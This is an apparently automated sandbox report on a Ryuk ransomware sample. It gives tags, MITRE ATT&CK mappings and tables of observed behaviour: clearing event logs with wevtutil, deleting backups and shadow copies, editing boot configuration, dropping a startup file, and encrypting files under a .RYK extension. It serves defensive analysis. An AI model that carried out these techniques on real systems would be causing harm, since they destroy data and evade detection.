Malware Analysis Report

2024-08-06 09:28

Sample ID 230309-wzyvtsbc7t
Target 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
SHA256 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
Tags
ryuk discovery evasion ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09

Threat Level: Known bad

The file 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe was found to be: Known bad.

Malicious Activity Summary

ryuk discovery evasion ransomware

Ryuk

Clears Windows event logs

Deletes shadow copies

Modifies boot configuration data using bcdedit

Deletes backup catalog

Disables Task Manager via registry modification

Disables taskbar notifications via registry modification

Disables use of System Restore points

Modifies file permissions

Drops startup file

Checks computer location settings

Enumerates connected drives

Launches sc.exe

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Creates scheduled task(s)

Views/modifies file attributes

Uses Volume Shadow Copy service COM API

Interacts with shadow copies

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Opens file in notepad (likely ransom note)

Runs net.exe

MITRE ATT&CK Matrix V6

Initial Access
TA0001
Execution
TA0002
Command-Line Interface
T1059
Scheduled Task
T1053
Persistence
TA0003
Scheduled Task
T1053
Hidden Files and Directories
T1158
Privilege Escalation
TA0004
Scheduled Task
T1053
Defense Evasion
TA0005
Indicator Removal on Host
T1070
File Deletion
T1107
File Permissions Modification
T1222
Hidden Files and Directories
T1158
Credential Access
TA0006
Discovery
TA0007
Query Registry
T1012
Peripheral Device Discovery
T1120
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Inhibit System Recovery
T1490

Analysis: static1

Detonation Overview

Reported

2023-03-09 18:22

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-03-09 18:22

Reported

2023-03-09 18:24

Platform

win7-20230220-en

Max time kernel

150s

Max time network

30s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe"

Signatures

Ryuk

ransomware ryuk

Clears Windows event logs

evasion ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Disables Task Manager via registry modification

evasion

Disables taskbar notifications via registry modification

evasion

Disables use of System Restore points

evasion

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\attrib.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\f: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\ProtectInitialize.rar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\QUAD\QUAD.ELM.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_SlateBlue.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152628.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0217872.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\form_edit.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\deploy\splash.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\liveleak.luac.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0222015.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Pushpin.eftx.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14792_.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FLYERHM.POC.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\conticon.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\com-sun-tools-visualvm-modules-startup.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105398.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ps.txt.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nassau.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jawt.lib.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02261_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\reflow.api.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.RSD.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099172.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18196_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21298_.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfontj2d.properties.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Adobe\Updater6\AdobeAUM_rootCert.cer.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ICE\ICE.ELM.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14830_.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR9F.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0285462.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_zh_CN.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RMNSQUE\PREVIEW.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02263_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Installed_resources14.xss.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL097.XML.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\UpdateUnblock.mp2.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Srednekolymsk.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic_5.5.0.165303.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00513_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Horizon.thmx.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\jfr\profile.jfc.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\vlc.mo.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099181.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\TAB_OFF.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR27F.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107302.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\SIGN.XML.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javafx.policy.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0195254.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\viewSelectionChanged.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL107.XML.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-core-output2.xml_hidden.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02361_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\EXPSRV.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
